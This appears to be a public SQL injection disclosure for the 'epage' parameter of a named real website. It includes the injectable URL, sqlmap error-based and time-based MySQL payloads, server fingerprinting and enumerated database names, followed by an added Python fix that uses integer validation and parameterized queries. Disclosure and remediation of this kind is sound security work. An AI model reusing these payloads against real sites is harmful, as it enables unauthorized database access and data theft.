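2015-11-27: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2016-01-11: The vendor has actively ignored the vulnerability; details are disclosed to the public
As the title says.
With a vulnerability this serious, is it too much to ask for a spot on the front page?
Injection URL: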
http://xj.lrbaba.com/index.php?comment&type=list&code=article&id=180&page=1&epage=3
The injectable parameter is epage; appending a single quote triggers an error:
GET parameter 'epage' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2098 HTTP(s) requests:
---
Parameter: epage (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: comment&type=list&code=article&id=180&page=1&epage=3 PROCEDURE ANALYSE(EXTRACTVALUE(7294,CONCAT(0x5c,0x71787a7a71,(SELECT (CASE WHEN (7294=7294) THEN 1 ELSE 0 END)),0x717

    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: comment&type=list&code=article&id=180&page=1&epage=3 PROCEDURE ANALYSE(EXTRACTVALUE(6825,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x66754441))))),1)
---
[15:28:59] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.1
[15:28:59] [INFO] fetching database names
[15:29:00] [INFO] the SQL query used returns 2 entries
[15:29:00] [INFO] retrieved: information_schema
[15:29:00] [INFO] retrieved: xjlrbaba
available databases [2]:
[*] information_schema
[*] xjlrbaba
Databases:
Member information:
Could not reach the vendor, or the vendor actively refused
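The fix for the pagination parameter reported above, as an added example that is not part of the original report and not the vendor's code. It assumes `epage` is a page size that ends up in a `LIMIT` clause (consistent with the PROCEDURE ANALYSE technique in the sqlmap output); the `comments` table, the bounds and the use of sqlite3 in place of MySQL are hypothetical.

```python
import sqlite3
from urllib.parse import parse_qs

MAX_EPAGE = 100  # assumed upper bound on page size

def parse_int(params, name, default, lo, hi):
    """Return params[name] as an int in [lo, hi]; reject anything else."""
    raw = params.get(name, [str(default)])[-1]
    # Digits only: rejects quotes, spaces, signs and trailing SQL keywords.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 6):
        raise ValueError(f"{name} must be a plain integer")
    value = int(raw)
    if not lo <= value <= hi:
        raise ValueError(f"{name} out of range")
    return value

def list_comments(conn, query_string):
    """Validate the paging parameters, then run a fully parameterized query."""
    params = parse_qs(query_string, keep_blank_values=True)
    article_id = parse_int(params, "id", 0, 1, 999999)
    page = parse_int(params, "page", 1, 1, 999999)
    epage = parse_int(params, "epage", 10, 1, MAX_EPAGE)
    # Values are bound as parameters, never concatenated into the SQL text.
    rows = conn.execute(
        "SELECT body FROM comments WHERE article_id = ? ORDER BY id LIMIT ? OFFSET ?",
        (article_id, epage, (page - 1) * epage),
    )
    return [r[0] for r in rows]

def demo_db():
    """Constructed in-memory data standing in for the comment table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, article_id INTEGER, body TEXT)")
    conn.executemany("INSERT INTO comments (article_id, body) VALUES (?, ?)",
                     [(180, f"comment {i}") for i in range(1, 8)])
    return conn

if __name__ == "__main__":
    db = demo_db()
    base = "comment&type=list&code=article&id=180&page=1&epage="
    print(list_comments(db, base + "3"))
    for bad in ("3'", "3 PROCEDURE ANALYSE"):  # the two input shapes from the report
        try:
            list_comments(db, base + bad)
        except ValueError as exc:
            print("rejected:", exc)
```

In PHP with PDO on MySQL, bind the `LIMIT` values with `PDO::PARAM_INT` after the same integer check, since emulated prepares otherwise quote them as strings.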